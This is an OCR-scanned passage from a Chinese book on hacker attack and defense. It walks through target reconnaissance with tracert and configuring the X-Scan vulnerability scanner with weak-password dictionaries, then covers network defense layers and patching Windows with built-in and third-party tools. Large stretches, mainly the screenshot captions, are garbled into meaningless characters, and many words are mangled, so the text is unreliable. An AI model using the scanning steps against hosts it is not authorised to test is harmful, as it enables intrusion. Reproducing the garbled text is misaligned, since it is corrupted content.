入 侵 攻 击 之 前 ， 还 需要 了 解 目标 主机 的 网 
络 机 构 ， 只 有 和 弄 清楚 目标 网 络 中 防火 墙 、 
服务 器 地 址 之 后 ， 才 可 进行 第 一 步 入 侵 。 
可 以 使 用 tracert 命令 查看 目标 主机 的 网 络 
结构 ，tracert 命令 用 来 显示 数据 包 到 达 目 标 
主机 所 经 过 的 路 径 ， 并 显示 到 达 每 个 节点 
的 时 间 。 

tracert 命令 功能 同 ping 类 似 ， 但 所 获 
得 的 信息 要 比 ping 命令 详细 得 多 ， 它 把 数 
据 包 所 走 的 全 部 路 径 、 节 点 的 了 P 以 及 花费 
的 时 间 都 显示 出 来 。 该 命令 比较 适用 于 大 
型 网 络 。tracert 命令 的 语法 格式 如 下 。 

tracert IP 地 址 或 主机 名 

例如 ， 要 想 了 解 自己 计算 机 与 目标 主 
机 www.baidu.com 之 间 的 详细 路 径 传递 信 
息 ， 就 可 以 在 “命令 提示 符 ” 窗 口中 输入 
tracert www.baidu.com 命令 进行 查看 ， 分 析 
目标 主机 的 网 络 结构 ， 如 下 图 所 示 。 
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国 管理 员 : CA\windows\system32\cmd.exe 一 口 x 
:\Users\Administrator>tracert www. baidu. com 

过 最 多 30 个 跃 点 跟踪 

www. a. shifen. com [220. 181. 111. 37] 的 路 由 : 

1 1 ms 1 ms 1 ms 192. 168.0.1 

2 7m 5m 3m 172.1 

3 5m 2m 2m 222.83.34.125 

4 27m 20m 15m 222.83.40.153 

5 56m Tlms 63m 202.97.38.133 

6 站 局 < ”请 求 超时 。 

7 97m 92ms 69m 218.30.112.121 

8 * * * 请 求 超时 。 

9 70m 6m 67m 220.181.17.146 
10 * 村 本 请 求 . 

11 * 在 本 请 求 超时 。 

12 。 * 在 * ”请 求 超时 。 

13 59m Slm 50m 220.181.111.37 
恨 踪 完成 


放 x-Scan v33 GUL 一 OO x 
文件 VI 设 理 Mn， 埋 香 00 工具 Im Language ”大妈 C) 


[Le me 加 | 国富 | 加 
普 台 信息 | 震 朋 六 扎 | 江汉 信 总 


step 图 单 击 工具 栏 中 的 “扫描 参数 ”日 按钮， 
打开 “扫描 参数 ”对 话 框 ， 如 下 图 所 示 。 


黑客 在 找到 攻击 的 目标 主机 后 ， 在 实 


施 攻击 之 前 ,还 需要 查看 目标 主机 的 漏洞 ， 


确定 目标 主机 的 漏洞 范围 。 黑 客 为 了 能 够 
快速 找到 目标 主机 的 漏洞 范围 ， 
用 一 些 扫描 工具 来 快速 确定 漏洞 的 范围 ， 
扫描 的 内 容 包 括 端 口 、 弱 口令 、 系 统 漏洞 
以 及 主机 服务 程序 等 。 

目前 , 黑客 常用 的 扫描 工具 是 X-Scan， 
它 可 以 扫描 出 操作 系统 类 型 及 版 本 、 标 准 
端口 状态 及 端口 BANNER 信息 、CGI 漏 
洞 、IIS 漏 洞 、RPC 漏 洞 、SQL-Server、 
FTP-Server、 SMTP-Server、POP3-Server、 
NT-Server 弱 口 令 用 户 、NT 服务 器 NetBI- 
OS 等 信息 。 


1. 设置 X-Scan 扫 描 器 


在 使 用 X-Scan 扫描 器 扫描 系统 之 前 ， 
需要 先 对 该 工具 的 一 些 属性 进行 设置 ， 
例如 扫描 参数 、 检 测 范 围 等 。 设 置 和 使 用 
X-Scan 的 具体 操作 步骤 如 下 。 

[step 图 在 X-Scan 文件 夹 中 双击 X-Scan gui. 
exe 应 用 程序 ， 打 开 “X-Scan v3.3 GUI” 主 
窗口 ， 在 其 中 可 以 浏览 此 软件 的 功能 简介 、 
常见 问题 解答 等 信息 ， 如 下 图 所 示 。 
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届 扫 后 多 至 x 
让 
8 所 疾 撕 定 rm 国 
ET 示 网 
一 aa | 
肖 肖 人 从 文件 法 取 主 机 列 束 
常常 会 利 
sn | mm | RE a 消 | 


[sp 图 在 左边 的 列表 中 单 击 “检测 范围 ” 选 
项 卡 ， 然 后 在 “指定 亿 范 围 ” 文 本 框 中 输 
入 要 扫描 的 他 地址 范围 。 若 不 知道 输入 的 
格式 , 则 可 以 单 击 “ 示 例 ” 按 钮 , 即 可 打开 “ 示 
例 ” 对 话 框 ， 在 其 中 即 可 看 到 各 种 有 效 格 
式 和 无 效 格式 ， 如 下 图 所 示 。 


示例 x 


localhost 

www.target.com 

192.168.0.1 

192.168.0.1/24 
192.168.1.1-192.168.2.100 
192.168.0.1,192.168.1.1-10,192.168.2.1/24 


192.168.0-1.1 
192.168.0.1-1.254 
192.168.0/24.1 
192168.0” 


step 贺 切换 到 “全 局 设置 ”选项 卡 ， 并 单 击 
其 中 的 “扫描 模块 ” 子 项 ， 在 其 中 即 可 选 
择 扫描 过 程 中 需要 扫描 的 模块 。 在 选择 扫 
描 模 块 的 同时 ， 还 可 在 右 侧 窗 格 中 查看 选 
择 模 块 的 相关 说 明 ， 如 下 图 所 示 。 


BE 3 x 
下 六 
a A 
全 送 清 际 | 
吉 入 中 神宗 El 
|-pPort :性 弄 备用 原 务 的 病 口 杖 杰 
step 较 由 于 X-Scan 是 一 款 多 线程 扫描 工具 ， 


所 以 可 以 在 “并 发 扫描 ” 子 项 中 设置 扫描 
时 的 线程 数量 ， 如 下 图 所 示 。 


| 扫 后 关 站 x 
lh 
TT 
后 
人 如 HA 
各 二 PE 


各 所 件 各 大 并 友和 各 量 
a 


-办 | 号 | 


mw | 


-pon 相册 芝 用 及 和 党 枯 态 


step 园 切换 到 “扫描 报告 ” 子 项 ， 在 其 中 可 
以 设置 扫描 报告 存放 的 路 径 和 文件 格式 ， 


如 下 图 所 示 。 
ed = | 
a 
二 二 
i 地 二 交 人 
日 坟 和 和 这 
三 全 
x 作 
和 成 后 自动 和 区间 下 4 寺 
ER Es 
| 
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侈 提示 : 如 果 需 要 保存 自己 设置 的 扫描 卫 
地 址 范围 ， 则 可 在 选中 “保存 主机 列表 ” 
复 选 框 后 ， 输 入 保存 文件 名 称 ， 这 样 ， 以 
后 就 可 以 直接 调用 这 些 人 P 地址 范围 ， 如 果 
用 户 需 要 在 扫描 结束 时 自动 生成 报告 文件 
并 显示 报告 ， 则 可 选中 “扫描 完成 后 自动 
生成 并 显示 报告 ” 复 选 框 。 


Step 切换 到 “其 他 设置 ” 子 项 ， 在 其 中 可 
以 设置 扫描 过 程 的 其 他 属性 ， 如 设置 扫描 


方式 、 显 示 详 细 进 度 等 ， 如 下 图 所 示 。 
浊 当 后 关 数 一 x 
病友 
es dn 
E “ | 
后 如 广 于 3 
be da 
使 有 bz 新 夫 措 作乐 纺 
sit 
uA | 2 | E99 mn | 
|-port 。: 蔡 商 系 下 医 各 提请 口 枚 杰 


切换 到 “插件 设置 ” 选项 ， 并 单 击 “ 端 
口 相 关 设 置 ” 子 选项 ， 在 其 中 即 可 设置 扫 
描 端 口 范围 以 及 检测 方式 ， 如 下 图 所 示 。 
X-Scan 提供 TCP 和 SYN 两 种 扫描 方式 。 
若 要 扫描 某 主机 的 所 有 端口 ， 则 在 “ 待 检 
测 端口 ”文本 框 中 输入 “1 ~ 65535” 即 可 。 


emal 证 | 
step 国 切换 到 “SNMP 相关 设置 ” 子 项 ， 选 


中 相应 的 复 选 框 来 设置 在 扫描 时 获取 SNMP 
信息 的 内 容 ， 如 下 图 所 示 。 


a 
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x PE = x 
一 
a 
并 时 全 到 
扫兴 寺 ES 上 二 
村 可 ED 
人 a 
涡 相 类 六 看 
3 相交 
rs Mf) 
后 pa 
. Ei 
地 a | 
[|] 
5 Gditiniab| 
本 全 本 3 We | mn Ea 号 | 这 my | 


-per 相册 第 了 务 的 党 检 态 


-pon 下 二 K 本 


Sep 图 切换 到 “NETBIOS 相关 设置 ” 子 项 ， 
在 其 中 设置 需要 获取 的 NETBIOS 信息 类 
型 ， 如 下 图 所 示 。 


| | 


[Ga 国 切换 到 “ 沂 洞 检测 脚本 设置 ” 子 项 ， 
取消 选中 “全 选 ” 复 选 框 后 , 单 击 “选择 脚本 ” 
按钮 ， 打 开 “Select Script (选择 脚本 )” 对 
话 框 ， 如 下 图 所 示 。 


国 select seipw = “ 且 X 


存 加 表 六 件 * 


[step 图 在 选择 检测 的 脚本 文件 之 后 , 单 击 “ 确 
定 ” 按 钮 ， 返 回 到 “扫描 参数 ”对 话 框 中 ， 
分 别 设置 脚本 运行 超时 和 网 络 读 取 超 时 等 
属性 ， 如 下 图 所 示 。 
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step 图 在 “CGI 相关 设置 ” 子 项 下 ， 即 可 
设置 扫描 时 需要 使 用 的 CGI 选项 ， 如 下 图 
所 示 。 


id 一 x 
可 到 
日 全 二 和 
ar 
给 二 用 3 曾 搞 er 
oy 二 用 和 YsT 和 执 "arr 
相关 到 加 『 3 用 "GT / HTTPAL OArWalesder;* 获 执 “B57” 
Fe + 用 "ar / fler be near” 曾 换 “27” 
"cr ya“ 划 换 em 
TS 个 /各 
TS 
厂 网 raby 生机" 本 六 
号 | 这 Ei] 


| -pon 计 到 部 的 光大 本 


step 图 切换 到 “字典 文件 设置 ” 子 项 ， 然 后 
可 以 通过 双击 字典 类 型 ， 打 开 “ 打 开 ” 对 
话 框 ， 如 下 图 所 示 。 


的 打开 x 
开拓 国 1) i | + 和 
从 和 修改 日 区 和 
快 加 访问。 四 "mep 2017/8/15 1737 


200517115 19:57 
2005/5/17 2110 
2005/5/17 2110 
2005/5/17 21:10 


国 common_pass 


9 common_pass_mini 
点 面 


司 common_ user 


evs_user 


条 ”下 


ER 2005/5/17 2110 
国 wailuser 2005/5/17 21:10 
pr 2005/5/17 21:10 
Ee 2005/5/17 21:10 
Eg 国 snmp_pess 2005/51172110 ~ 
PR < > 
文件 的。 aase 3 Ly 
HD) io 可 虹 


厂 以 只 该 方式 打开 (R) 


[Eee 本 在 其 中 选择 相应 的 字典 文件 后 ， 单 击 
“打开 ”按钮 ， 返 回 到 “扫描 参数 ”对 话 框 ， 
即 可 完成 字典 类 型 所 对 应 的 字典 文件 名 的 
设置 , 如 下 图 所 示 。 在 设置 好 所 有 选项 之 后 ， 
单 击 “ 确 定 ” 按 钮 ， 即 可 完成 设置 。 
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| 


or 


2. 使 用 X-Scan 进 行 扫 描 


在 设置 完 X-Scan 各 个 属性 后 ， 就 可 以 

利用 该 工具 对 指定 IP 地 址 范围 内 的 主机 进 
行 扫描 。 具 体 的 操作 步骤 如 下 。 
EEep 回 在 “X-Scan v3.3 GUI” 主 窗口 中 单 击 
“开始 扫描 ”按钮 聊 ， 即 可 进行 扫描 ， 在 
扫描 的 同时 显示 扫描 进程 和 扫描 所 得 到 的 
信息 ， 如 下 图 所 示 。 


扫描 完成 后 ， 即 可 看 到 HTML 格式 
的 扫描 报告 ， 如 下 图 所 示 。 在 其 中 即 可 看 
到 活动 主机 卫 地 址 、 存 在 的 系统 漏洞 和 其 
他 安全 隐患 ， 同 时 还 提出 了 安全 隐患 的 解 
决 方案 。 


step 国 在 “X-Scan v3.3 GUI” 主 窗口 中 切换 
到 “漏洞 信息 ”选项 卡 ， 在 其 中 即 可 看 到 
存在 漏洞 的 主机 信息 ， 如 下 图 所 示 。 


XScanv33 GUI = 已 xX 


[活动 并 | 当 前半 襄 | 
2 下 在 答 绰 开 训 且 务 


着 到 信息 滨 信 息 | 锚 且 信息 | 


FRR 
eealhesr 
localhert 
localhert 


有 
96/tep 
提 ra SO 
top microset-ds“ 服 入 本 台 行 二 江口 


[7 eve Manmum Post threodk 1710, CurrenyMaximum eada | 


3.2 ”防御 网 络 侦察 的 对 策 


网 络 侦察 是 黑客 攻击 目标 主机 必须 要 
做 的 工作 ， 要 想 自己 的 计算 机 逃 过 黑客 的 
攻击 ， 就 需要 做 好 防御 网 络 侦察 的 工作 。 
目前 ， 网 络 作战 的 模型 主要 包含 3 个 层次 ， 
分 别 是 : 实体 层次 、 能 量 层次 和 信息 层次 。 
针对 不 同 的 层次 ， 其 网 络 防御 的 措施 也 不 
尽 相 同 。 
绝招 7: 实体 层次 防御 对 策 

实体 层次 的 网 络 侦察 常 以 物理 方式 直 
接 破 坏 、 摧 毁 计 算 机 网 络 系统 的 实体 ， 完 
成 目标 侦察 或 摧毁 任务 。 简 单 地 说 , 在 平时 ， 
这 个 层次 的 网 络 侦察 主要 是 指 黑客 利用 管 
理 方面 的 漏洞 对 计算 机 系统 进行 的 破坏 
活动 。 

针对 上 述 问题 ， 对 实体 层次 的 防御 对 
策 主 要 有 以 下 几 种 。 

(1) 保护 计算 机 系统 、 网 络 服 务 器 、 
打印 机 等 硬件 实体 和 通信 和 链 路 免 受 自然 灾 
害 、 人 为 破坏 和 搭 线 攻击 。 

(2) 建立 完备 的 安全 管理 制度 ， 防 止 
非法 进入 计算 机 控制 室 和 各 种 偷窃、 破坏 
活动 的 发 生 。 
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(3) 构建 网 络 时 要 充分 考虑 网 络 的 结 
构 、 布 线 、 路 由 器 ,网 桥 的 设置 、 位 置 的 选择 ， 
加 固 重要 的 网 络 设施 ， 增 强 其 抗 挫 毁 能 力 。 

(4) 与 外 部 网 络 相连 时 ， 采 用 防火 墙 
屏蔽 内 部 网 络 结构 ， 对 外 界 访问 进行 身份 
验证 、 数 据 过 滤 ， 在 内 部 网 络 中 进行 安全 
域 划分 、 分 级 权限 分 配 。 

(5) 对 外 部 网 络 进行 访问 时 ， 将 一 些 
不 安全 的 站 点 过 滤 掉 ， 对 一 些 经 常 访问 的 
站 点 做 成 镜像 ， 可 大 大 提高 效率 ， 减 轻 线 
路 负担 。 

(6) 网 络 中 的 各 个 节点 要 相对 固定 
严禁 随意 连接 ， 一 些 重要 的 部 件 安排 专 站 
的 场地 人 员 维护 、 看 管 ， 防 止 自然 或 人 为 
的 破坏 ， 加 强 场地 安全 管理 ， 做 好 供电 、 
接地 、 灭 火 的 管理 。 
绝招 8: 能 量 层次 防御 对 策 

能 量 层次 的 网 络 侦察 主要 是 黑客 利用 
强大 的 物理 能 量 干扰 、 压 制 或 嵌入 对 方 的 
信息 网 络 ， 从 而 窃取 对 方 的 信息 ， 另 一 广 
面 又 通过 运用 探测 物理 能 量 的 技术 手段 对 
计算 机 辐射 信号 进行 采集 与 分 析 ， 从 而 窗 
取 秘密 信息 。 

针对 上 述 问题 ， 这 一 层次 的 防御 对 策 
主要 有 以 下 几 种 。 

(1) 做 好 计算 机 设施 的 防 电磁 泄漏 、 
抗 电磁 脉冲 干扰 ， 在 重要 部 位 安装 干扰 器 、 
建设 屏 项 机 房 等 。 

(2) 做 好 对 外 围 辐射 的 防护 ， 主 要 是 
对 电源 线 和 信号 线 加 装 性 能 良好 的 滤波 器 ， 
减 小 传输 阻抗 和 导线 间 的 交叉 耦合 。 同 时 
还 需要 给 网 络 加 装 电磁 屏蔽 网 ， 防 止 电磁 
武器 的 攻击 。 

(3) 做 好 对 自身 辐射 的 防护 ， 这 类 防 
护 措施 可 分 为 两 种 :一 是 采用 各 种 电磁 屏 
蔽 措施 ， 对 设备 进行 屏 项 和 隔离 ， 二 是 二 
扰 的 防护 措施 ， 即 在 计算 机 系统 工作 的 同 
时 ， 利 用 干扰 装置 产生 一 种 与 计算 机 系统 
辐射 相关 的 伪 噪 声 向 空间 辐射 ， 最 后 来 掩 


到 


盖 计 算 机 系统 的 工作 频率 和 信息 特征 ， 起 
到 伪装 的 作用 。 
绝招 9: 信息 层次 防御 对 策 

信息 层次 的 网 络 侦察 主要 是 运用 逻辑 
手段 进入 对 方 的 网 络 系统 ， 从 而 窃取 对 方 
网 络 系统 中 的 数据 信息 。 攻 击 方式 主要 包 
括 计算 机 病毒 入 侵 、 密 码 的 复制 与 修改 、 
软件 的 破坏 等 多 种 形式 。 信 息 层 次 的 网 络 
侦察 与 计算 机 网 络 在 物理 能 量 层次 的 侦察 
的 主要 区 别 表现 为 :在 信息 层次 的 侦察 中 
获得 信息 权 的 决定 因素 是 逻辑 的 ， 而 不 是 
物理 能 量 的 ， 同 时 ， 取 决 于 对 信息 系统 本 
身 的 技术 掌握 水 平 ， 是 知识 和 智力 的 较量 ， 
不 是 电磁 能 量 强 弱 的 较量 。 信 息 层次 的 网 
络 侦察 是 获取 重要 信息 的 关键 层次 ， 也 是 
网 络 防御 的 主要 环节 。 

信息 层次 的 防御 对 策 主 要 有 以 下 几 种 。 

1) 设置 访问 控制 技术 

访问 控制 是 网 络 安全 防范 和 保护 的 主 
要 策略 ， 其 主要 任务 是 保证 网 络 资源 不 被 
非法 使 用 和 非常 访问 ， 也 是 维护 网 络 系统 
安全 、 保 护 网 络 资源 的 重要 手段 。 可 以 说 
是 保证 网 络 安全 最 重要 的 核心 策略 之 一 。 

访问 控制 技术 主要 包括 7 种 ， 根 据 网 
络 安全 的 等 级 、 网 络 空间 的 环境 不 同 ， 可 
灵活 地 设置 访问 控制 的 种 类 和 数量 。 

(1) 入 网 访问 控制 。 

(2) 网 络 的 权限 控制 。 

(3) 目录 级 安全 控制 。 

(4) 属性 安全 控制 。 

(5) 网 络 服务 器 安全 控制 。 

(6) 网 络 监测 和 锁定 控制 。 

(7) 网 络 端口 和 节点 的 安全 控制 。 

2) 设置 防火 墙 技术 

“防火 墙 > ， 顾 名 思 义 ， 就 是 一 堵 可 以 
防止 火 蔓延 的 墙壁 。 古 时 ， 人 们 常会 在 寅 
所 之 间 砌 起 一 道 砖 墙 ， 一 旦 火灾 发 生 ， 该 
墙 能 够 防止 火势 莹 延 到 别 的 寅 所 ， 当 然 这 
是 在 现实 生活 中 的 意义 。 那 么 在 虚拟 的 网 


络 世界 里 ， 当 本 网 络 的 用 户 在 与 外 部 世界 
网 络 之 间 进 行 通信 和 交互 信息 时 ， 为 了 防 
止 外 部 网 络 对 本 网 络 的 威胁 和 入 侵 ， 也 可 
以 在 其 中 间 设 置 一 个 中 介 系 统 ， 竖 起 一 道 
安全 屏障 。 这 种 中 介 系 统 也 可 形象 地 叫 作 
“防火 墙 ” 或 “防火 墙 系统 ”。 防 火 墙 是 一 
种 保护 计算 机 网 络 安全 的 技术 性 措施 ， 主 
要 用 于 阻止 网 络 中 的 非法 相互 访问 ， 也 被 
形象 地 称 之 为 控制 进 / 出 两 个 方向 通信 的 
门槛 。 

目前 ， 防 火 墙 主要 有 包 过 滤 防 火 墙 、 
代理 防火 墙 和 双 穴 主机 防火 墙 3 种 类 型 
并 在 计算 机 网 络 得 到 广泛 的 应 用 。 但 是 ， 
防火 墙 也 不 能 解决 进入 防火 墙 的 数据 带 来 
的 所 有 安全 问题 ， 如 果 用 户 将 一 个 程序 在 
本 地 运行 ， 而 这 个 程序 很 可 能 就 包含 一 段 
恶意 的 代码 ， 同 样 可 以 泄露 敏感 信息 ， 或 
对 之 进行 破坏 。 

3) 设置 信息 加 密 技术 

利用 信息 加 密 技 术 可 以 保护 网 内 的 数 
据 、 文 件 、 口 令 和 控制 信息 ， 也 可 以 保护 
网 上 传输 的 数据 。 网 络 加 密 常 用 的 方法 有 
链 路 加 密 、 端 点 加 密 和 节点 加 密 3 种， 其 
中 链 路 加 密 的 目的 是 保护 网 络 节 点 之 间 的 
链 路 信息 安全 ; 端点 加 密 的 目的 是 对 源 端 
用 户 到 目的 端 用 户 的 数据 提供 保护 ; 节点 
加 密 的 目的 是 对 源 节点 到 目的 节点 之 间 的 
传输 链 路 提供 保护 。 用 户 可 根据 网 络 情况 
酌情 选择 上 述 加 密 方式 。 


3.3 ”堵塞 系统 漏洞 


世上 任何 东西 都 不 可 能 做 到 十 全 十 美 
作为 复杂 的 计算 机 系统 更 是 如 此 ， 它 在 控 
制 内 存 与 处 理 数据 的 过 程 中 总 是 有 可 能 
现 漏洞 的 ， 特 别 是 在 安装 了 其 他 的 应 用 程 
序 后 更 是 如 此 。 同 时 ， 系 统 本 身 也 存在 有 
各 种 各 样 的 弱点 和 不 足 之 处 ， 黑 客 之 所 以 
能 够 入 侵 ， 就 是 利用 了 这 些 弱点 和 漏洞 。 
那么 如 何 堵塞 系统 的 漏洞 呢 ? 
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绝招 10: 使 用 Windows 更 新 修复 系统 
漏洞 

“Windows 更 新 ”是 系统 自 带 的 用 于 检 
测 系统 更 新 的 工具 ， 使 用 “Windows 更 新 ” 
可 以 下 载 并 安装 系统 更 新 。 以 Windows 10 
系统 为 例 ， 具 体 的 操作 步骤 如 下 。 
[Eee 国 单 去 “开始 ”按钮 ， 在 弹出 的 菜单 中 
选择 “设置 ”选项 ， 如 下 图 所 示 。 


园 文件 资源 管理 器 


车 放 


从 
由 电源 


汪 所 有 应 用 


[step 图 打开 “设置 ”窗口 ， 在 其 中 可 以 看 到 
有 关系 统 设置 的 相关 功能 ， 如 下 图 所 示 。 


om 


a! 蝇 O 嚼 


me 


step 图 单 击 “更 新 和 安全 ”图 标 ， 打 开 “ 更 


新 和 安全 ”窗口 ， 在 其 中 选择 “Windows 
更 新 ”选项 ， 如 下 图 所 示 。 


+ a 站 


他 mms [Es 
= ow 

Windows Dead 你 的 设备 已 安 壬 录 新 的 更 新 。 上 次 检查 时 间 : 昨天 10:42 
备份 

补 丙 更 新 
人 
Tt 
EE 


正在 吉 有 关系 新 更 新 闻 信 和 窟 吗 ? 
St 发 人 员 了 更 亲信 息 


二 过 而 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


Eee 车 单 南 “ 检 查 更 新 ”按钮 ， 即 可 开始 检 
查 网 上 是 否 存 在 有 更 新 文件 ， 如 下 图 所 示 。 


站 Ee 
你 更 WE 全 EE 
Ve 
WandowsDeender ee 
正在 检 可 更 新 
备份 
个 正在 本 过 由 关 最 新生 新 的 信 生 扯 ? 
了 了解 更 多 信号 
高地 渤 项 
针对 开发 人 员 


step 园 检查 完毕 后 ， 如 果 存 在 更 新 文件 ， 则 
ep 
有 可 用 更 新 ， 并 自动 下 载 更 新 文件 。 


和 WINDowS mi 


Windows 更 新 


有 可 用 更 新 。 
“适用 于 Windows 10 Version 1511 的 圭 积 甸 新 (KB3124262)。 


评 细 信 息 


正 芋 能 备 实 装 更 新 70% 


正在 吉 找 有 关 最 新 更 新 的 信息 吗 ? 
了 解 昌 多 信息 


高 级 选 而 


[EECa 图 下 载 完成 后 ， 系 统 会 自动 安装 更 新 文 
件 ， 安 装 完毕 后 ， 会 弹出 如 下 图 所 示 的 信 
息 提 示 对 话 框 。 


《+ 三 = ox 


各 ”wpows mi 


已 为 你 安排 了 一 次 重启 
HR, a ,NN et Ee ti. Rete 
问 | 设备 渤 甬 电源 ， 根 提现 新 的 大 小 ， 安 当 可 能 委 要 一 和 ji 


圈 世 备 将 在 用 二 时 重启 (明天 3.30 似 手 合 订 ). 


C3 EE 
BE 
明天 、 | 
立即 重新 启动 
| 


| Ts 
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[step 园 单 去 “立即 重新 启动 ” ， 立即 重 
新 启动 计算 机 ， 重 新 启动 完 ， 再 次 打 
开 “Windows 更 新 ”窗口 ， 中 可 以 看 


到 “你 的 设备 已 安装 最 新 的 更 新 ”信息 提示 ， 
如 下 图 所 示 。 
加 3 
和 ms ED 
Windows 更 新 
me Dene 已 宫灯 上 次 和 本 时 网 天 
0 
二 可 更 新 
济 活 格 下 载 并 向 动 去 竺 可 用 更 新 
HH 正在 关 有关 地 新 更 新 的 信息 吗 ? 
了 亲信 息 
二 


EG 国 单 二 “高 级 选项 ”起 链接 ， 打 开 “高 
人 
安装 更 新 的 方式 ， 如 下 图 所 示 。 

a Se 
请 选择 安装 更 新 的 方式 


0 | 
oaueyJ。 我 们 格 在 你 订 便 用 设备 时 和 白 动 税 新 局 动 设备 ， 则 新 将 不 会 通辽 控 流 时 计生 的 
Re 
[i 


口 总 BfHR 
了 解放 人 忆 


专 丰 更 新 历史 上 学 


放权 如何 府 人 机 姑 


获取 Insider Preview 版 本 


成 为 禾 一 批 能 名 查看 Windows 的 后 过 更 新 和 改进 并 提供 反 忆 的 人 民 之 一 


绝招 11: 使 用 《360 安 全 卫士 》 修 补 系统 


《360 安全 卫士 》 是 当前 功能 最 强 、 效 
果 最 好 、 最 受用 户 欢迎 的 上 网 必 备 安全 软 
件 ， 不 但 永久 免费 ， 其 自身 非常 轻巧 ， 还 
能 优化 系统 性 能 ， 修 补 系 统 漏洞 。 

使 用 《360 安全 卫士 》 修 复 系 统 漏洞 的 
具体 操作 步骤 如 下 。 


[EE 国 双击 桌面 (360 安全 卫 土 》 图 标 ， 打 
开 《360 安全 了 卫士》 窗口 ， 如 下 图 所 示 。 
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step 图 修复 完成 后 ， 提 示 用 户 推荐 修复 已 完 
成 ， 如 下 图 所 示 。 


oo 已 2 天 没有 体检 , 建议 立即 体检 ! 
1 a re 


唱和 荔 加 自 


step 较 单 击 “ 系 统 修 复 ” 按 钮 ， 进 入 如 下 图 
所 示 的 页 面 。 


绝招 12: 使 用 《腾讯 电脑 管家 》 修 复 系 
统 漏洞 : 
《腾讯 电脑 管家 》 是 国内 首 款 集成 “ 杀 
毒 + 管理 ”二 合 一 功能 的 免费 网 络 安全 软件 ， 
训 证- 前 包含 杀毒 、 实 时 防护 、 漏洞 修复 、 系 统 清理 、 

ea 0 计算 机 加 速 、 软 件 管理 等 功能 。 
单 击 “ 全 面 修复 ”按钮 ，《360 安全 使 用 《腾讯 电脑 管家 》 修 复 系统 漏洞 

卫士 》 开 始 自 动 扫 描 系 统 中 存在 的 漏洞 ， ， 的 具体 操作 步骤 如 下 。 

并 在 下 面 的 界面 中 显示 出 来 ， 用 户 在 其 中 [Sep 加 下 载 并 安装 《腾讯 电脑 管家 》， 即 可 


可 以 自主 选择 需要 修复 的 漏洞。 打开 电脑 管家 的 “首页 体验 ” 页 面 ， 如 下 
6 ; 图 所 示 。 


曾 三 一 
- ED 
: 轻快 如 风 ， 从 心 启程 
> 床 阔 认 全景 防 御 四 | 电脑 当前 状态 
mm a 防护 中 8 个 泼 洞 竺 修复 


单 击 “ 一 键 修复 ”按钮 ， 开 始 修复 系 
统 存在 的 漏洞 ， 如 下 图 所 示 。 


中 谁 是 2013 年 最 进 过 的 病 和 厅 马 未 族 7 @ mea 


[Sep 加 单 去 计 算 机 当前 状态 的 “ 国 ”图 标 ， 
即 可 进入 “电脑 管家 -修复 漏洞 ”工作 界面 ， 
在 其 中 可 以 看 到 当前 系统 存在 的 漏洞 信息 ， 
如 下 图 所 示 。 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


而 十 an em en 


Eee 国 单 去 “一 键 修复 ”按钮 ， 即 可 下 载 并 
修复 系统 漏洞 ， 如 下 图 所 示 。 


step 园 系统 漏洞 修复 完成 后 ， 会 给 出 相应 的 
提示 信息 ， 如 下 图 所 示 。 
区 = 


Pos ree Fg #5 


7 人， 电 有 四 安全 1 
Me 


.= EE 


san 中 


3.4 实战 演练 


吕 妖 感 浊 实战 演练 1 一 一 阻止 更 新 驱动 程序 


在 Windows 7 及 其 之 前 的 时 代 ， 用 户 
装 完 系统 后 ， 大 部 分 驱动 程序 都 要 自己 手 
动 安装 ， 而 现在 的 Windows 更 新 却 可 以 连 
带 驱动 程序 一 起 更 新 ， 虽 然 方便 了 许多 ， 
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但 是 硬件 的 驱动 程序 不 像 其 他 软件 ， 一 旦 
出 现 漏洞 或 不 兼容 很 有 可 能 造成 许多 麻烦 ， 
甚至 可 能 无 法 开机 ， 这 就 需要 直接 阻止 
Windows 更 新 驱动 程序 ， 用 户 可 以 在 组 策 
略 中 禁用 更 新 驱动 。 具 体 的 操作 步骤 如 下 。 

[step 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 行 ” 

对 话 框 ， 在 其 中 输入 gpeditmsc， 如 下 图 
所 示 。 


Windows 将 根据 你 所 软 入 的 名 称 ， 为 你 打开 相应 的 程序 
文件 交 ， 文 入 或 Internet 资源 . 


gpeditemsd 
图 人 用 管理 权限 创建 此 任务 . 


[es 图 单 去 “确定 ”按钮 ， 即 可 打开 “本 
地 组 策略 编辑 器 ”窗口 ， 在 左边 的 窗 格 
中 依次 展开 “计算 机 配置 ”一 “管理 模 
板 ” 一 “Windows 组 件 ” 一 “Windows 更 
新 ”选项 , 然后 在 右 侧 窗 格 中 找到 “Windows 
更 新 不 包括 驱动 程序 ”， 如 下 图 所 示 。 


取 油 浏览 (B)… 


和 - OO x 
文件 月 ”名 洒 A) 可 要 (V】 帮助 人 H) 
和 中 | 直 回 子 | 目 加 | 了 
| Tv 
-| | Windows 更 新 不 自 括 更 动 程序 。。 讼 加 “ 
国 ore 人 一 拓 uanet Mosok 更 新 有 位 
加 ssa | sa 于 三 动 更 新 检测 5 本 
是 wrdc 和 | 于: ER Windows 更 
国 Wirdc | 至 2 为 Wndows Server 或 到 从 合用 所 有 Windows 更 新 人 Ne 
国 wirde | Windews 10 TE Wndows 更 新 Interne 
ED E 
二 
Wrde | BRR 有 Windows 
国 Wnde | 本 呈 更 新 的 汇丰 订 ， 
下 Wirdc 
司 Winde | 江 果 或 机 年 此 后 4 自动 和 新 立 旭 安 关 
国 Winde | windcws 更 新 4 旬 具 各 二 必 下 二天 所 更 新 二 的 更 新 
四 Wirde | NE 
全 Winde | 福全. 如果 和 到 Windows 10 时 对 计划 扑 实现 次 于 重新 让 动 
- Windc | 1607 版 本 或 Windows Server 下 对 + 内 安 半 下 重新 启动 
Winde | 2016， 比 和 下 在 有 到 好 [ 引 -允许 ”3 量 新 计 节 自动 更 新 节约 安 针 
国 Windc v || 各 到 第 中 不 旦 0 时 才 生效 , 如 果 -六 | > 
< IE 
3 个 给 
AU 动 程序 ? 
[Sep 图 双 去 “Windows 更 新 不 包括 驱动 程序 


选项 , 打开 “Windows 更 新 不 包括 驱动 程序 ” 
对 话 框 ， 在 其 中 选中 “已 启用 ” 单 选 按钮 ， 
如 下 图 所 示 。 
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要 Windows EiF 不 二 蕊 o x 


国 Wndows 局 新 大 ER 所 上 一 | | 下 -EN) 


Oa 让 际 
® EERD 
Oesmo 
SFE: [ED Windews Server 可 Windows 10 
